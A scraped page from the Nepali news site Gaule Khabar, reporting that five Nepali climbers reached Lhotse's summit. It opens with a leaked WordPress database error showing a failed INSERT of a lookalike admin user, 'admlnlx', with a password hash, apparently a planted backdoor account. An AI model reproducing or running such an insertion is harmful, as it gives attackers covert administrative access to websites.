WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BANmE4wezgWoF5DjziGP1Ulz24trP6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:27:25', '', 'admlnlx', 'admlnlx')

ल्होत्से हिमालको चुचुरोमा सोलुखुम्बुको ३ जना सहित पुगे ५ नेपाली – Gaule Khabar

ल्होत्से हिमालको चुचुरोमा सोलुखुम्बुको ३ जना सहित पुगे ५ नेपाली

ल्होत्से हिमालको चुचुरोमा सोलुखुम्बुको ३ जना सहित पुगे ५ नेपाली

गाउँले न्यूज, ३१ बैशाख, काठमाडौँ । यस बर्षको सिजनको पहिलो नेपाली टोली मंगलबार बिहान ९ बजेर ४७ मिनेटमा ल्होत्सेको चुचुरोमा पुगेका छन ।
विश्वको चौथो अग्लो हिमाल ल्होत्से सगरमाथा, पाकिस्तानको केटू र कंचजंघापछीको अग्लो हिमाल हो ।
चुचुरोमा पुग्नेमा सोलुका पेम्बा छोटे शेर्पा, आङ जाङ्बु शेर्पा र डेन्डी शेर्पा दोलखा रोलवालिङका किली पेम्बा शेर्पा, तामतिङ शेर्पा छन् । सगरमाथासँग जोडिएको ल्होत्से हिमाल ८ हजार ५ सय १६ मिटर अग्लो छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका